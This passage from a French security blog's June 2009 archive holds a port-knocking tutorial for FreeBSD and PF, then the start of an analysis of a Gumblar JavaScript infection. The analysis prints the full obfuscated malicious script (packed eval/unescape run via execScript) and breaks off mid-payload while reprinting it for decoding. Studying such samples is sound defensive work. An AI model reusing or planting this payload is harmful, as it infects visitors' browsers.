June 2009 Archives

30-06-2009 01:00:05

[Secu] Port Knocking sous FreeBSD avec PF

La sécurité commence par l'obfuscation. Moins on en dit et moins on en montre et mieux c'est. En partant sur ce principe a été développé Knockd qui consiste à faire du Port Knocking, c'est à dire ouvrir et fermer des ports à la demande afin de laisser dissimuler certaines services. Certes cela n'a aucun intérêt pour un serveur Web d'utilisation classique mais cela peut être très utile pour tout ce qui est serveur d'administration.

En effet quel intérêt de laisser par exemple à découvert son port SSH sinon de se retrouver avec des logs à n'en plus finir de tentatives de brute force ?
C'est pour cela que nous allons ici le mettre en place sur FreeBSD avec la particularité de ne pas utiliser IPFW pour lequel Knockd est configuré de base mais utiliser plutot PF, le célèbre firewall d'OpenBSD :)

La grosse différence entre IPTABLES / IPFW et PF est que PF n'est pas dynamique. On ne peut ajouter une règle à la volée. Il va falloir donc utiliser un autre moyen. PF possède un système qui consiste à créer des tables et d'appliquer certaines règles à ces tables. C'est ce que nous allons faire pour notre problème.

On installe le paquet knock suivant :
(19:11:17 cloud ~) 0 $ psearch port-knocking
security/knock            A flexible port-knocking server and client

On crée ensuite un fichier de configuration basé sur le sample que l'on nous donne dans /usr/local/etc :
#cp /usr/local/etc/knockd.conf.sample /usr/local/etc/knockd.conf

On configure maintenant ce fichier selon nos besoin en modifiant pour utiliser la commande pfctl.
[options]
        logfile = /var/log/knockd.log
        interface = ath0

[openSSH]
        sequence    = 8000,220,8000
        seq_timeout = 5
        command     = /sbin/pfctl -t knockssh -T add %IP%
        tcpflags    = syn

[closeSSH]
        sequence    = 3000,2365,7536
        seq_timeout = 5
        command     = /sbin/pfctl -t knockssh -T delete %IP%
        tcpflags    = syn
On voit donc ici que l'on ajoute à la table knockssh l'IP obtenue et dans la 2e commande, que l'on supprime l'IP de la table knockssh.

Voyons maintenant notre configuration PF
block in log all
block out log all

table <knockssh> persist
pass in quick proto tcp from <knockssh> to any  port 22
Règle toute simple : on crée une table et on laisse passer tout traffic provenant d'une IP ajoutée dans la table knockssh en direction du port 22.

Il est possible de lancer knockd en daemon mais pour tester nous allons le lancer à la main :
C19:07:50 cloud /usr/home/cloud) 0 $ sudo knockd -c /usr/local/etc/knockd.conf
Ensuite depuis un client on lance la commande knock sur les ports désignés dans le knockd.conf pour ouvrir le port 22 :
[user@pcclient /usr/ports/security/knock]# knock -v 88.158.21.23 8000 220 8000
hitting tcp 88.158.21.23:8000
hitting tcp 88.158.21.23:220
hitting tcp 88.158.21.23:8000
On observe alors sur le serveur :
(19:08:14 cloud /usr/home/cloud) 0 $ sudo knockd -c /usr/local/etc/knockd.conf
1/1 addresses added.

(00:49:04 cloud /usr/home/cloud) 0 $ sudo pfctl -t knockssh -T show
   91.121.93.163
   
(00:49:21 cloud /usr/home/cloud) 0 $ tail /var/log/knockd.log 
[2009-06-30 00:49] 91.121.93.163: openSSH: Stage 1
[2009-06-30 00:49] 91.121.93.163: openSSH: Stage 2
[2009-06-30 00:49] 91.121.93.163: openSSH: Stage 3
[2009-06-30 00:49] 91.121.93.163: openSSH: OPEN SESAME
[2009-06-30 00:49] openSSH: running command: /sbin/pfctl -t knockssh -T add 91.121.93.163
On voit donc bien dans les logs la commande s'exécuter et l'adresse s'ajouter à la table knockssh.

Le port-knocking est je pense une très bonne technique d'obfuscation qui protégera 99% des attaques programmées que l'on trouve sur internet. De plus cela permet de voir arriver une attaque qui va créer beaucoup de logs s'ily a tentative de brute force. Par contre cela oblige à avoir un client de port knocking pour débloquer un port mais est ce vraiment un problème pour de l'administration ?

Posted by cloud | Permanent link | File under: FreeBSD, OpenSource, Security

23-06-2009 19:28:52

[Secu] Etude d'une infection JavaScript Gumblar par l'exemple

On voit actuellement de plus en plus d'exploits basés sur des Javascripts. Pourquoi ? Car tout simplement ils sont très facilement modifiables et offuscables et du coup difficilement détectables par les antivirus. De plus l'impact est massif car tout le monde surf sur le web. Ces JS vont par la suite faire appel à des lecteurs de flux genre Flash ou PDF qui sont victimes de nombreuses vulnérabilités et ou le temps de réaction et de mise à jour est assez long.

On va donc ici mettre notre casquette de Sherlock Holmes et étudier une infection via le magnifique Gumblar.

Nous tombons donc sur un site avec une iframe pointant vers un site étrange contenant juste un JS. Voici son code :

<html>

<head><title>My Homepage</title></head><body>

<script>

function Jyg3s7(Nl3b98){

     window.execScript(Nl3b98);

}

Jyg3s7(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return 
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new 
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return 
p}('1u(1v(\'%w%H%r%g%h%k%p%r%2%s%W%15%o%1c%S%T%l%u%J%0%1%i%d%E%i%d%4%A%j%e%2%g%e%K%l%M%V%T%L%14%2%y%2%v%p%g%H%x%3%r%h%m%g%e%3%j%h%3%X%l%3%x%3%r%h%0%f%p%9%b%F%a%0%a%I%a%6%1%8%3%6%g%1%7%8%h%1%1%8%7%6%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%6%5%a%5%c%9%5%c%1%5%b%5%c%0%5%7%n%k%u%z%2%f%f%1%1%t%i%d%4%g%e%K%l%M%V%T%L%14%m%q%3%h%K%h%h%e%k%F%H%h%3%0%f%k%9%a%1%v%9%b%a%f%m%e%3%o%l%j%g%3%0%n%c%0%5%7%5%a%5%c%8%5%c%9%5%c%1%5%b%5%c%6%n%k%u%z%2%f%f%1%z%g%e%K%l%M%V%T%L%14%1%t%i%d%4%g%e%K%l%M%V%T%L%14%m%q%3%h%K%h%h%e%k%F%H%h%3%0%f%g%0%b%6%l%b%8%j%1%8%9%q%9%b%7%9%9%q%0%a%8%k%6%7%a%v%b%8%8%f%m%e%3%o%l%j%g%3%0%n%c%0%5%7%5%c%1%5%c%6%5%c%9%5%b%5%c%8%5%a%n%k%u%z%2%f%f%1%z%f%g%1%7%l%8%0%q%a%8%b%0%k%b%7%v%1%6%0%19%6%1%1q%9%0%1%1d%8%7%T%6%a%18%b%b%0%8%Y%1%1h%9%1h%0%b%18%7%9%1l%6%b%18%8%1h%9%0%K%a%0%1%S%0%8%1l%8%b%7%10%a%9%10%9%1d%7%7%L%b%9%7%1l%7%1%T%6%U%b%S%b%9%a%K%7%1%1l%1%a%L%6%8%L%9%b%Y%a%L%7%7%7%R%0%G%6%b%Y%a%a%6%1b%9%T%b%0%X%0%7%S%7%1%a%18%6%a%0%0%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%9%5%b%5%c%8%5%c%0%5%c%1%5%a%5%7%n%k%u%z%2%f%f%1%1%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%A%j%e%2%o%u%10%w%U%A%v%S%u%j%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%x%b%q%b%O%6%6%x%7%9%l%0%1b%7%a%8%m%6%6%9%17%b%6%M%0%1a%b%1o%7%b%7%16%9%7%9%16%7%6%C%a%f%m%e%3%o%l%j%g%3%0%n%a%5%c%0%5%7%5%c%9%5%b%5%c%6%5%c%8%5%c%1%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%4%4%A%j%e%2%q%14%H%Z%J%K%1m%14%M%15%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%12%8%6%6%s%a%0%7%b%3%9%6%6%l%8%8%0%a%l%b%1%m%8%K%a%o%a%9%o%b%0%0%8%l%1%a%8%k%6%9%g%7%7%9%j%b%6%h%8%7%k%9%1%1%p%7%r%a%a%f%m%e%3%o%l%j%g%3%0%n%b%5%c%6%5%7%5%c%1%5%c%0%5%c%9%5%c%8%5%a%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%4%4%A%j%e%2%g%l%Z%k%1f%k%U%R%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%j%1%8%v%7%6%b%p%8%7%v%7%b%6%7%F%0%a%a%m%a%8%0%6%a%q%8%9%h%9%9%7%e%6%7%3%6%7%8%1%j%0%0%0%x%1%6%f%m%e%3%o%l%j%g%3%0%n%a%5%7%5%b%5%c%1%5%c%8%5%c%9%5%c%0%5%c%6%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%i%d%4%4%h%e%P%i%d%4%4%E%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%h%P%o%3%2%y%2%10%t%i%d%4%4%4%o%u%10%w%U%A%v%S%u%j%m%p%o%3%r%0%f%V%1%6%9%X%1%7%16%a%7%b%f%m%e%3%o%l%j%g%3%0%n%7%5%c%6%5%c%1%5%a%5%c%0%5%c%8%5%c%9%5%b%n%k%u%z%2%f%f%1%z%f%s%b%7%0%h%1%1%0%h%7%7%1%b%o%0%9%19%6%0%n%1%n%8%F%9%6%3%8%9%q%9%b%h%a%l%a%9%k%a%1%b%6%h%b%6%a%3%1%7%v%6%7%6%7%k%1%1%1%q%0%9%0%b%g%8%p%a%a%A%9%8%6%3%a%6%0%e%0%8%b%m%8%9%6%g%7%1%r%8%9%0%7%19%6%1%8%U%8%6%0%b%L%9%8%7%1%0%U%8%L%8%b%n%9%l%6%a%p%8%j%9%v%7%m%1%6%o%b%6%9%s%7%0%1%0%o%9%b%1s%6%8%k%9%b%a%0%b%v%a%8%7%y%6%L%1%b%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%9%5%c%0%5%c%1%5%c%6%5%b%5%a%5%7%n%k%u%z%2%f%f%1%z%w%j%l%q%3%1%t%i%d%4%4%4%o%u%10%w%U%A%v%S%u%j%m%q%3%r%v%0%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%p%o%3%r%0%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%1m%e%k%h%3%0%o%u%10%w%U%A%v%S%u%j%m%e%3%q%o%p%r%q%3%1q%p%v%P%1%t%i%d%4%4%4%A%j%e%2%I%18%W%o%V%R%1e%R%2%y%2%f%m%7%8%8%9%9%n%6%a%n%6%a%a%a%m%9%b%a%0%m%1%8%b%9%n%7%n%6%7%a%w%7%a%b%k%1%a%8%l%a%0%1%3%9%b%a%b%m%6%3%0%a%O%b%8%3%7%8%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%8%5%c%0%5%a%5%7%5%b%5%c%1%5%c%9%n%k%u%z%2%f%f%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%12%j%A%3%16%p%G%k%l%3%0%I%18%W%o%V%R%1e%R%z%1b%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%Y%l%p%q%3%0%1%t%i%d%4%4%D%i%d%i%d%4%4%g%j%h%g%s%0%3%1%2%E%D%i%d%i%d%4%4%h%e%P%i%d%4%4%E%i%d%4%4%4%q%14%H%Z%J%K%1m%14%M%15%m%q%s%3%l%l%3%O%3%g%H%h%3%0%I%18%W%o%V%R%1e%R%1%t%i%d%4%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%2%E%D%D%i%d%4%g%j%h%g%s%0%3%1%2%E%D%D%i%d%i%d%s%W%15%o%1c%S%T%l%u%J%0%1%t%i%d%i%d%w%H%r%g%h%k%p%r%2%x%s%u%S%1o%1b%O%v%M%s%0%1%i%d%E%i%d%4%w%p%e%0%F%q%l%I%G%1j%q%p%Z%2%y%2%1b%z%2%11%A%13%C%N%w%X%O%N%2%y%2%B%B%t%2%F%q%l%I%G%1j%q%p%Z%2%1g%y%2%1b%18%t%2%F%q%l%I%G%1j%q%p%Z%Q%Q%1%i%d%4%E%i%d%4%4%11%A%13%C%N%w%X%O%N%2%y%2%12%h%e%k%r%u%m%w%e%p%x%Y%s%j%e%Y%p%v%3%0%18%1h%2%Q%2%F%q%l%I%G%1j%q%p%Z%1%t%i%d%4%4%A%j%e%2%s%13%S%u%x%N%M%h%v%2%y%2%r%3%J%2%1p%x%j%u%3%0%1%t%i%d%4%4%s%13%S%u%x%N%M%h%v%m%q%e%g%2%y%2%B%e%3%q%19%n%n%B%2%Q%2%11%A%13%C%N%w%X%O%N%2%Q%2%B%19%c%c%B%2%Q%2%f%C%1%6%e%b%p%0%0%8%9%0%u%1%e%6%j%7%x%a%6%b%6%2%1%8%1%8%G%1%6%1%k%a%l%8%6%3%a%a%7%q%9%f%m%e%3%o%l%j%g%3%0%n%b%5%c%9%5%c%0%5%a%5%c%8%5%7%5%c%1%5%c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%W%9%9%H%0%0%a%1%h%0%1%9%l%0%6%9%8%p%a%0%0%p%0%a%1i%0%9%8%2%6%b%X%7%O%1%o%0%1%6%a%e%a%3%b%9%q%9%q%0%0%9%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%9%5%c%0%5%7%5%b%5%c%8%5%a%5%c%1%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%x%9%8%6%q%0%7%a%p%7%a%b%3%8%9%b%e%6%8%3%a%a%8%q%1%b%7%6%m%0%v%b%8%l%0%b%8%l%b%f%m%e%3%o%l%j%g%3%0%n%b%5%c%6%5%c%8%5%c%1%5%a%5%c%9%5%c%0%5%7%n%k%u%z%2%f%f%1%2%Q%2%B%n%7%1b%n%10%B%t%i%d%i%d%4%4%k%w%0%s%13%S%u%x%N%M%h%v%m%s%3%k%u%s%h%2%y%y%2%1h%T%1%i%d%4%4%E%i%d%4%4%4%F%e%3%j%1i%t%i%d%4%4%D%i%d%i%d%4%4%s%13%S%u%x%N%M%h%v%2%y%2%f%f%t%i%d%4%D%i%d%i%d%4%e%3%h%H%e%r%2%11%A%13%C%N%w%X%O%N%t%i%d%D%i%d%i%d%w%H%r%g%h%k%p%r%2%J%P%1t%P%O%M%1e%r%0%H%e%l%1%i%d%E%i%d%4%A%j%e%2%11%A%13%C%N%w%X%O%N%2%y%2%x%s%u%S%1o%1b%O%v%M%s%0%1%t%i%d%4%k%w%2%0%11%A%13%C%N%w%X%O%N%2%y%y%2%f%1n%f%1%2%e%3%h%H%e%r%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%A%j%e%2%o%17%1a%x%C%1c%16%G%15%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%f%q%7%r%7%o%9%0%A%1%9%0%8%J%1%a%m%8%8%8%7%12%a%r%7%a%b%8%j%0%1%o%b%6%0%6%q%0%0%6%6%s%7%p%9%8%h%7%9%b%2%8%b%7%1%1e%0%7%k%a%1%9%3%6%7%b%J%6%9%b%3%1%0%e%a%1%8%7%2%6%7%7%Y%9%9%1%0%p%9%9%r%0%h%b%8%e%8%b%p%7%b%l%1%9%9%7%8%m%0%8%10%1%9%a%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%0%5%b%5%7%5%c%1%5%c%9%5%c%6%5%a%n%k%u%z%2%f%f%1%1%t%i%d%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%i%d%4%E%i%d%4%4%k%w%2%0%o%17%1a%x%C%1c%16%G%15%2%6%y%2%f%1n%0%0%9%p%6%F%8%a%6%7%I%6%6%3%1%g%7%6%h%1%7%b%1r%1%6%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%9%5%c%6%5%b%5%a%5%c%1%5%c%0%5%7%n%k%u%z%2%f%f%1%1%2%e%3%h%H%e%r%t%i%d%4%D%i%d%i%d%4%o%17%1a%x%C%1c%16%G%15%m%12%r%j%o%q%s%p%h%C%j%h%s%2%y%2%H%e%l%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%o%17%1a%x%C%1c%16%G%15%m%Y%p%x%o%e%3%q%q%3%v%C%j%h%s%2%y%2%11%A%13%C%N%w%X%O%N%2%Q%2%B%19%c%c%B%2%Q%2%f%C%7%9%1%8%e%b%1%0%p%1%6%0%7%u%b%6%b%1%e%8%j%1%9%7%b%x%1%6%b%2%a%8%G%0%0%a%1%k%8%8%8%0%l%a%8%0%1%3%9%6%b%q%8%9%f%m%e%3%o%l%j%g%3%0%n%a%5%b%5%c%0%5%c%8%5%7%5%c%1%5%c%9%5%c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%W%8%0%H%7%b%h%6%8%7%l%6%p%8%0%p%1%1i%7%1%8%2%a%8%7%a%X%1%1%O%7%b%o%7%1%7%e%7%8%8%3%7%q%6%b%9%6%q%a%1%f%m%e%3%o%l%j%g%3%0%n%c%8%5%a%5%c%1%5%7%5%c%9%5%b%5%c%0%5%c%6%n%k%u%z%2%f%f%1%2%Q%2%B%c%c%B%2%Q%2%f%J%0%0%6%j%0%a%F%b%6%1%m%8%a%9%a%0%3%b%a%O%a%8%3%0%1%f%m%e%3%o%l%j%g%3%0%n%a%5%c%1%5%c%9%5%c%0%5%c%8%5%7%5%c%6%5%b%n%k%u%z%2%f%f%1%t%i%d%4%4%o%17%1a%x%C%1c%16%G%15%m%C%e%k%r%h%12%r%j%o%q%s%p%h%0%1%t%i%d%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%E%D%t%i%d%i%d%4%A%j%e%2%s%R%12%H%11%p%11%V%2%y%2%q%3%h%1p%r%h%3%e%A%j%l%0%w%H%r%g%h%k%p%r%0%1%E%k%w%2%0%o%17%1a%x%C%1c%16%G%15%m%e%3%j%v%P%12%h%j%h%3%2%y%y%2%R%1%2%E%g%l%3%j%e%1p%r%h%3%e%A%j%l%0%s%R%12%H%11%p%11%V%1%t%J%k%r%v%p%J%m%l%p%g%j%h%k%p%r%2%y%2%f%l%9%0%a%a%v%6%j%b%8%o%6%1%19%9%b%n%8%b%n%9%1%0%9%f%m%e%3%o%l%j%g%3%0%n%7%5%c%8%5%c%0%5%c%6%5%b%5%c%1%5%c%9%5%a%n%k%u%z%2%f%f%1%t%D%D%z%2%S%L%L%L%1%t%i%d%D%i%d%i%d%J%P%1t%P%O%M%1e%r%0%f%s%8%0%7%h%8%b%6%h%6%6%6%o%1%19%9%7%0%n%7%0%n%a%F%a%a%b%3%b%7%8%b%q%8%9%h%a%8%9%l%a%k%8%h%6%3%b%9%a%8%v%7%8%k%6%1%6%b%q%b%9%g%6%8%9%p%6%6%7%A%8%0%3%8%7%0%e%0%7%9%m%b%9%6%g%6%9%9%r%9%9%6%6%19%a%0%0%U%7%a%8%L%0%0%U%1%L%0%7%n%7%0%7%l%7%6%0%6%p%9%0%6%j%a%a%v%8%m%a%6%o%1%8%7%6%6%s%9%7%o%1%0%6%1s%6%a%k%b%v%7%0%6%y%7%10%b%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%1%5%a%5%c%9%5%7%5%b%5%c%8%5%c%0%n%k%u%z%2%f%f%1%1%t%d%w%H%r%g%h%k%p%r%2%1a%10%x%P%T%s%x%I%0%1%E%d%4%C%1d%G%2%y%2%r%3%J%2%K%e%e%j%P%0%B%K%g%e%p%C%1d%G%m%C%1d%G%B%z%2%B%C%1d%G%m%C%v%w%Y%h%e%l%B%1%t%d%4%w%p%e%0%k%2%k%r%2%C%1d%G%1%d%4%E%d%4%4%h%e%P%d%4%4%E%d%4%4%4%p%F%I%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%C%1d%G%1n%k%1r%1%t%d%4%4%4%k%w%2%0%p%F%I%1%d%4%4%4%E%d%4%4%4%4%v%p%g%H%x%3%r%h%m%J%e%k%h%3%0%f%1g%k%w%e%j%x%3%2%q%e%g%y%B%g%j%g%s%3%n%e%3%j%v%x%3%m%o%v%w%B%1k%1g%n%k%w%e%j%x%3%1k%f%1%t%d%4%4%4%D%d%4%4%D%d%4%4%g%j%h%g%s%0%3%1%E%D%d%4%D%d%4%h%e%P%d%4%E%d%4%4%p%F%I%2%y%2%r%3%J%2%K%g%h%k%A%3%17%W%F%I%3%g%h%0%B%12%s%p%g%1i%J%j%A%3%G%l%j%q%s%m%12%s%p%g%1i%J%j%A%3%G%l%j%q%s%B%1%t%d%4%4%k%w%2%0%p%F%I%1%d%4%4%E%d%4%4%4%v%p%g%H%x%3%r%h%m%J%e%k%h%3%0%f%1g%k%w%e%j%x%3%2%q%e%g%y%B%g%j%g%s%3%n%w%l%j%q%s%m%q%J%w%B%1k%1g%n%k%w%e%j%x%3%1k%f%1%t%d%4%4%D%d%4%D%d%4%g%j%h%g%s%0%3%1%E%D%d%D%d%1a%10%x%P%T%s%x%I%0%1%t\'));',62,94,'u0028|u0029|u0020|u0065|u0009|u007c|u0021|u0023|u005e|u0024|u0026|u0040|u005c|u000a|u0072|u0027|u0063|u0074|u000d|u0061|u0069|u006c|u002e|u002f|u0070|u006f|u0073|u006e|u0068|u003b|u0067|u0064|u0066|u006d|u003d|u002c|u0076|u0022|u0050|u007d|u007b|u0062|u0046|u0075|u006a|u0077|u0041|u0030|u004d|u0071|u0078|u0079|u002b|u0034|u0033|u0039|u0038|u0047|u004f|u0045|u0043|u004a|u0031|u007a|u0053|u0051|u0037|u0059|u0054|u0058|u0036|u003a|u004c|u0032|u005a|u0044|u0056|u0052|u003c|u0035|u006b|u004e|u003e|u002d|u0057|u005b|u0048|u0049|u0042|u005d|u003f|u0055|eval|unescape'.split('|'),0,{}))

</script>

</body>

</html>



C'est tout simplement incompréhensible. Donc nous allons commencer par traduire cela en affichant le résultat dans une page web en remplacant le Jyg3s7 par document.write :

<html>

<head><title>My Homepage</title></head><body>

<script>

function Jyg3s7(Nl3b98){

     window.execScript(Nl3b98);

}

document.write(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return 
d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new 
RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return 
p}('1u(1v(\'%w%H%r%g%h%k%p%r%2%s%W%15%o%1c%S%T%l%u%J%0%1%i%d%E%i%d%4%A%j%e%2%g%e%K%l%M%V%T%L%14%2%y%2%v%p%g%H%x%3%r%h%m%g%e%3%j%h%3%X%l%3%x%3%r%h%0%f%p%9%b%F%a%0%a%I%a%6%1%8%3%6%g%1%7%8%h%1%1%8%7%6%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%6%5%a%5%c%9%5%c%1%5%b%5%c%0%5%7%n%k%u%z%2%f%f%1%1%t%i%d%4%g%e%K%l%M%V%T%L%14%m%q%3%h%K%h%h%e%k%F%H%h%3%0%f%k%9%a%1%v%9%b%a%f%m%e%3%o%l%j%g%3%0%n%c%0%5%7%5%a%5%c%8%5%c%9%5%c%1%5%b%5%c%6%n%k%u%z%2%f%f%1%z%g%e%K%l%M%V%T%L%14%1%t%i%d%4%g%e%K%l%M%V%T%L%14%m%q%3%h%K%h%h%e%k%F%H%h%3%0%f%g%0%b%6%l%b%8%j%1%8%9%q%9%b%7%9%9%q%0%a%8%k%6%7%a%v%b%8%8%f%m%e%3%o%l%j%g%3%0%n%c%0%5%7%5%c%1%5%c%6%5%c%9%5%b%5%c%8%5%a%n%k%u%z%2%f%f%1%z%f%g%1%7%l%8%0%q%a%8%b%0%k%b%7%v%1%6%0%19%6%1%1q%9%0%1%1d%8%7%T%6%a%18%b%b%0%8%Y%1%1h%9%1h%0%b%18%7%9%1l%6%b%18%8%1h%9%0%K%a%0%1%S%0%8%1l%8%b%7%10%a%9%10%9%1d%7%7%L%b%9%7%1l%7%1%T%6%U%b%S%b%9%a%K%7%1%1l%1%a%L%6%8%L%9%b%Y%a%L%7%7%7%R%0%G%6%b%Y%a%a%6%1b%9%T%b%0%X%0%7%S%7%1%a%18%6%a%0%0%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%9%5%b%5%c%8%5%c%0%5%c%1%5%a%5%7%n%k%u%z%2%f%f%1%1%t%i%d%i%d%4%h%e%P%i%d%4%E%i%d%4%4%A%j%e%2%o%u%10%w%U%A%v%S%u%j%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%x%b%q%b%O%6%6%x%7%9%l%0%1b%7%a%8%m%6%6%9%17%b%6%M%0%1a%b%1o%7%b%7%16%9%7%9%16%7%6%C%a%f%m%e%3%o%l%j%g%3%0%n%a%5%c%0%5%7%5%c%9%5%b%5%c%6%5%c%8%5%c%1%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%4%4%A%j%e%2%q%14%H%Z%J%K%1m%14%M%15%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%12%8%6%6%s%a%0%7%b%3%9%6%6%l%8%8%0%a%l%b%1%m%8%K%a%o%a%9%o%b%0%0%8%l%1%a%8%k%6%9%g%7%7%9%j%b%6%h%8%7%k%9%1%1%p%7%r%a%a%f%m%e%3%o%l%j%g%3%0%n%b%5%c%6%5%7%5%c%1%5%c%0%5%c%9%5%c%8%5%a%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%4%4%A%j%e%2%g%l%Z%k%1f%k%U%R%2%y%2%g%e%K%l%M%V%T%L%14%m%Y%e%3%j%h%3%W%F%I%3%g%h%0%f%j%1%8%v%7%6%b%p%8%7%v%7%b%6%7%F%0%a%a%m%a%8%0%6%a%q%8%9%h%9%9%7%e%6%7%3%6%7%8%1%j%0%0%0%x%1%6%f%m%e%3%o%l%j%g%3%0%n%a%5%7%5%b%5%c%1%5%c%8%5%c%9%5%c%0%5%c%6%n%k%u%z%2%f%f%1%z%f%f%1%t%i%d%i%d%4%4%h%e%P%i%d%4%4%E%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%h%P%o%3%2%y%2%10%t%i%d%4%4%4%o%u%10%w%U%A%v%S%u%j%m%p%o%3%r%0%f%V%1%6%9%X%1%7%16%a%7%b%f%m%e%3%o%l%j%g%3%0%n%7%5%c%6%5%c%1%5%a%5%c%0%5%c%8%5%c%9%5%b%n%k%u%z%2%f%f%1%z%f%s%b%7%0%h%1%1%0%h%7%7%1%b%o%0%9%19%6%0%n%1%n%8%F%9%6%3%8%9%q%9%b%h%a%l%a%9%k%a%1%b%6%h%b%6%a%3%1%7%v%6%7%6%7%k%1%1%1%q%0%9%0%b%g%8%p%a%a%A%9%8%6%3%a%6%0%e%0%8%b%m%8%9%6%g%7%1%r%8%9%0%7%19%6%1%8%U%8%6%0%b%L%9%8%7%1%0%U%8%L%8%b%n%9%l%6%a%p%8%j%9%v%7%m%1%6%o%b%6%9%s%7%0%1%0%o%9%b%1s%6%8%k%9%b%a%0%b%v%a%8%7%y%6%L%1%b%f%m%e%3%o%l%j%g%3%0%n%c%8%5%c%9%5%c%0%5%c%1%5%c%6%5%b%5%a%5%7%n%k%u%z%2%f%f%1%z%w%j%l%q%3%1%t%i%d%4%4%4%o%u%10%w%U%A%v%S%u%j%m%q%3%r%v%0%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%p%o%3%r%0%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%1m%e%k%h%3%0%o%u%10%w%U%A%v%S%u%j%m%e%3%q%o%p%r%q%3%1q%p%v%P%1%t%i%d%4%4%4%A%j%e%2%I%18%W%o%V%R%1e%R%2%y%2%f%m%7%8%8%9%9%n%6%a%n%6%a%a%a%m%9%b%a%0%m%1%8%b%9%n%7%n%6%7%a%w%7%a%b%k%1%a%8%l%a%0%1%3%9%b%a%b%m%6%3%0%a%O%b%8%3%7%8%f%m%e%3%o%l%j%g%3%0%n%c%6%5%c%8%5%c%0%5%a%5%7%5%b%5%c%1%5%c%9%n%k%u%z%2%f%f%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%12%j%A%3%16%p%G%k%l%3%0%I%18%W%o%V%R%1e%R%z%1b%1%t%i%d%4%4%4%g%l%Z%k%1f%k%U%R%m%Y%l%p%q%3%0%1%t%i%d%4%4%D%i%d%i%d%4%4%g%j%h%g%s%0%3%1%2%E%D%i%d%i%d%4%4%h%e%P%i%d%4%4%E%i%d%4%4%4%q%14%H%Z%J%K%1m%14%M%15%m%q%s%3%l%l%3%O%3%g%H%h%3%0%I%18%W%o%V%R%1e%R%1%t%i%d%4%4%D%i%d%i%d%4%g%j%h%g%s%0%3%1%2%E%D%D%i%d%4%g%j%h%g%s%0%3%1%2%E%D%D%i%d%i%d%s%W%15%o%1c%S%T%l%u%J%0%1%t%i%d%i%d%w%H%r%g%h%k%p%r%2%x%s%u%S%1o%1b%O%v%M%s%0%1%i%d%E%i%d%4%w%p%e%0%F%q%l%I%G%1j%q%p%Z%2%y%2%1b%z%2%11%A%13%C%N%w%X%O%N%2%y%2%B%B%t%2%F%q%l%I%G%1j%q%p%Z%2%1g%y%2%1b%18%t%2%F%q%l%I%G%1j%q%p%Z%Q%Q%1%i%d%4%E%i%d%4%4%11%A%13%C%N%w%X%O%N%2%y%2%12%h%e%k%r%u%m%w%e%p%x%Y%s%j%e%Y%p%v%3%0%18%1h%2%Q%2%F%q%l%I%G%1j%q%p%Z%1%t%i%d%4%4%A%j%e%2%s%13%S%u%x%N%M%h%v%2%y%2%r%3%J%2%1p%x%j%u%3%0%1%t%i%d%4%4%s%13%S%u%x%N%M%h%v%m%q%e%g%2%y%2%B%e%3%q%19%n%n%B%2%Q%2%11%A%13%C%N%w%X%O%N%2%Q%2%B%19%c%c%B%2%Q%2%f%C%1%6%e%b%p%0%0%8%9%0%u%1%e%6%j%7%x%a%6%b%6%2%1%8%1%8%G%1%6%1%k%a%l%8%6%3%a%a%7%q%9%f%m%e%3%o%l%j%g%3%0%n%b%5%c%9%5%c%0%5%a%5%c%8%5%7%5%c%1%5%